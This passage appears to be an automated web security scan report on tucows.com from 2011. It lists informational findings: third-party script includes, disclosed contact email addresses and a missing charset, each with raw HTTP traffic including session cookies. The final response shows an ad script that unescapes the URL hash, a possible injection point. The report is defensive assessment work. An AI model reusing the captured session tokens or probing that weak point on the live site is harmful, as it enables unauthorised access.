Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.26. http://www.tucows.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.27. http://www.tucows.com/preview/194850/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://www.google-analytics.com/urchin.js

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.28. http://www.tucows.com/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.29. http://www.tucows.com/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.30. http://www.tucows.com/software.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

7.31. http://www.tucows.com/terms.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

8. Email addresses disclosed
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. http://www.tucows.com/advertise.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The following email address was disclosed in the response:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<a href="mailto:kristal@butterscotch.com">kristal@butterscotch.com</a>
...[SNIP]...

8.2. http://www.tucows.com/affiliate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<a href="mailto:developer@tucows.com">developer@tucows.com</a>
...[SNIP]...

8.3. http://www.tucows.com/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<a href="mailto:reseller.support@tucows.com">reseller.support@tucows.com</a>
...[SNIP]...
<a href="mailto:sales@opensrs.org">sales@opensrs.org</a>
...[SNIP]...

9. HTML does not specify charset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /videoegg/ad.html HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:51:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 923

<html>
<head></head>
<body>
<script>
var config = {};
var am;
var hash = window.location.hash;
if (hash != null) {
var str = unescape(unescape(hash));
   str = str.substring(2);
str =
...[SNIP]...